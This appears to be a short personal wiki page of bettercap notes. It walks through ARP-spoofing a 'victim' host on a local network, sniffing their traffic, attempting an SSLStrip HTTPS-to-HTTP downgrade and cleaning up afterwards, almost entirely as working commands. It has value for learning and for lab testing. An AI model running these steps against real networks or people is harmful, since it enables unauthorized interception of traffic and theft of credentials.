Bettercap - kdaisho/Blog GitHub Wiki

1. Enable IP forwarding

echo 1 | sudo tee /proc/sys/net/ipv4/ip_forward

(This automatically goes back to 0 after reboot)

2. Launch

sudo bettercap -iface <*your_network_interface>

*wlp0s20f3

3. Start ARP spoofing

net.probe on

4. List hosts

net.show

5. Identify your victim's IP and the Gateway IP

Now start spoofing:

set arp.spoof.targets <victim_ip>
arp.spoof on

6. Optionally sniff:

set net.sniff.verbose true
net.sniff on

7. You can also use: (Not sure if this works)

set http.proxy.sslstrip true
http.proxy on

SSLStrip will try to downgrade HTTPS to HTTP where possible (many modern sites prevent this now via HSTS)

8. Verify the attack

On the victim's machine:

  • Try browsing some insecure (HTTP) sites.

On the attacker side:

  • Use tcpdump or wireshark to see if traffic is being intercepted.

9. Cleanup

Once done:

arp.spoof off
net.sniff off
http.proxy off

Also disable IP forwarding:

echo 0 | sudo tee /proc/sys/net/ipv4/ip_forward
⚠️ **GitHub.com Fallback** ⚠️